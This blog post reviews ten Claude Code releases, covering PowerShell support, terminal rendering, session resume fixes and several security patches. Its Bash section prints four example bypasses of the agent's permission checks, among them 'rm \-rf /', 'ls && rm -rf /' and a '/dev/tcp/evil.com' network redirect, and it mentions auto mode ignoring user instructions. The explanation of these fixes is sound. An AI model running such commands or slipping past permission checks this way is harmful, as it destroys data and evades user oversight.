What Changed While Claude Code Shipped 10 Updates

#ai #claudecode #developertools #terminal

The Terminal Is Becoming an IDE

Claude Code's identity is "an AI coding tool that runs in your terminal." But recent updates suggest it's not just AI bolted onto a terminal — it's an attempt to turn the terminal itself into an IDE.

PowerShell tool support landed in 2.1.84 as an opt-in preview for Windows. Previously, the only option was the Bash tool, which meant Windows users needed WSL, Git Bash, or sheer willpower. Now native Windows commands just work, with syntax guidance that adapts to PowerShell 5.1 vs 7+.

# Before: Using Claude Code on Windows
# Install WSL, or install Git Bash, or give up

# After: It just works
claude> "Run the build script for this project"
# PowerShell tool handles it natively

What makes the PowerShell tool interesting isn't the feature itself — it's how deep the security work goes. In 2.1.90 alone, four PowerShell security patches landed. A trailing & background job bypass, a -ErrorAction Break debugger hang, an archive extraction TOCTOU attack, and a parse-failure fallback degrading deny rules. Every one of these is a real attack vector.

In Unreal Engine, you see the same pattern. The editor keeps absorbing features — live coding, hot reload, in-editor testing — and every new capability creates a new attack surface. Plugging the holes is always harder than building the feature.

In 2.1.89, CLAUDE_CODE_NO_FLICKER=1 was introduced. The name is modest, but the impact is significant. It brings alt-screen rendering with virtualized scrollback, eliminating the screen flickering that plagued terminal updates. In game terms, this is like switching on double buffering. Screen tearing disappears, and the tool starts feeling like an environment rather than a utility.

2.1.97 built on top of this with a focus view (Ctrl+O). It shows just the prompt, a one-line tool summary with edit diffstats, and the final response. In long sessions, you can skip the noise and see results only.

# Ctrl+O enters focus view
# What you see: your prompt → one-line tool summary → final answer
# What you don't see: 20 files read, 5 greps, 3 dead ends

# '/' opens transcript search
# 'n'/'N' to step through matches

Transcript search (/ → n/N) in 2.1.83. /powerup for interactive feature tutorials in 2.1.90. /team-onboarding for auto-generating teammate ramp-up guides in 2.1.101. They all point the same way.

Writing code, searching, learning, sharing with the team — all without leaving the terminal. It's picking up what IDEs do, one piece at a time. The key is that it's not getting heavier like an IDE. It keeps the terminal's lightness while layering on just enough. If that balance breaks, people will just use VS Code. So far, the balance holds.

Bash Permission Bypass — How Fast the Holes Get Plugged

Claude Code's auto mode is powerful. It reads files, edits them, and runs commands without per-action approval. But powerful means dangerous.

In 2.1.98 alone, four Bash tool security fixes shipped.

# Fix 1: Backslash-escaping flags to disguise them
rm \-rf /  # This was auto-allowed as read-only

# Fix 2: Compound commands bypassing forced prompts
ls && rm -rf /  # ls is safe, so the whole thing passed

# Fix 3: Env-var prefix bypass
HARMLESS=1 dangerous-command  # Prefix present = no check

# Fix 4: /dev/tcp network redirect
cat < /dev/tcp/evil.com/1234  # This was auto-allowed

If you've dealt with game server security, these patterns are familiar. When you parse packets from clients, testing only well-formed packets makes everything look fine. But someone crafts malformed bytes and the server crumbles. Defense isn't about allowing valid input — it's about rejecting everything that isn't.

The Claude Code team is patching fast, which is a good sign. In 2.1.101, they fixed a command injection vulnerability in the POSIX which fallback used for LSP binary detection. That's either from an external exploit report or an internal security audit.

2.1.89 also fixed auto mode ignoring explicit user instructions. Telling it "don't push" and it pushes anyway. Telling it "wait for X before Y" and it runs Y immediately. As auto mode's permissions expand, how precisely it follows user intent becomes as important as technical security.

2.1.98 introduced CLAUDE_CODE_SUBPROCESS_ENV_SCRUB=1. When enabled, it strips Anthropic and cloud provider credentials from subprocess environments — Bash tool, hooks, MCP stdio servers. Subprocesses can no longer access $ANTHROPIC_API_KEY and similar variables.

# With CLAUDE_CODE_SUBPROCESS_ENV_SCRUB=1
# Every command run by the Bash tool has these stripped:
# ANTHROPIC_API_KEY, AWS_SECRET_ACCESS_KEY, etc.

echo $ANTHROPIC_API_KEY  # empty

This is process isolation — the same pattern as separating game logic from auth services on game servers. If one process gets compromised, it can't reach the other.

The volume and speed of security patches tell you something: the Claude Code team treats this tool as production infrastructure. Hobby projects don't get this level of security hardening.

--resume Is Finally Starting to Work

--resume continues a previous session. Sounds simple. In practice, it was the most consistently broken feature in Claude Code.

A regression appeared in 2.1.69. Users with deferred tools, MCP servers, or custom agents would hit a full prompt cache miss on the first request after resuming. This wasn't fixed until 2.1.90. Cache misses for 20 versions.

# Before (2.1.69~2.1.89)
claude --resume
# → Full prompt cache miss on first request
# → Entire context retransmitted
# → Slow, wasteful

# After (2.1.90+)
claude --resume
# → Cache hit
# → Picks up right where you left off

But that was just the start. The list of resume-related fixes across subsequent versions shows how deep this problem goes.

In 2.1.101, the loader anchoring on a dead-end branch in large sessions — losing conversation context entirely — was fixed. Resume chain recovery bridging into an unrelated subagent conversation was also fixed. The session history is stored as a tree structure, and these bugs meant following the wrong node.

Game developers will instantly recognize why this is hard. Save/load is one of the buggiest systems in any game. The state is large, dependencies between states are complex, and the format evolves over time.

Save file format changes → old saves fail to load
Session transcript format changes → old sessions fail to resume

In 2.1.86, sessions created before v2.1.85 couldn't be resumed due to "tool_use ids were found without tool_result blocks." Classic save format compatibility issue.

In 2.1.97, cache misses during resume, messages typed mid-turn not being saved to the transcript, and file edit diffs disappearing after resume (for files larger than 10KB) were all fixed.

Why does resume break so often? Because a Claude Code session isn't a simple chat log. Tool call results, file edit history, MCP server state, subagent context — they're all interleaved. Serializing and deserializing that mess produces endless edge cases.

The direction is right, though. In 2.1.101, claude -p --resume <n> gained support for session titles set via /rename or --name. In 2.1.90, the resume picker started loading all project sessions in parallel for faster load times. Features and stability are advancing together.

Stable session continuity means Claude Code transitions from a "use once and discard" tool to an environment that maintains working context. In game terms, it's going from a roguelike with no saves to an RPG where your progress persists. Completely different experience.

What Two Weeks of Updates Tell You

Read each of the 10 updates line by line and they look like a list of individual bug fixes. Step back and look at the whole picture, and you can see where Claude Code is heading.

It's making the terminal capable of more without leaving it. It's tightening security layers proportionally as permissions expand. And it's using session continuity to shift from "tool" to "environment."

To a game developer's eye, this looks like a live-service stabilization phase. Features keep shipping, but foundational infrastructure — stability and security — is being pulled up simultaneously. Get through this phase well and the tool becomes genuinely production-grade.

Ten updates in two weeks. As long as this pace holds, the Claude Code you used yesterday is not the Claude Code you're using today.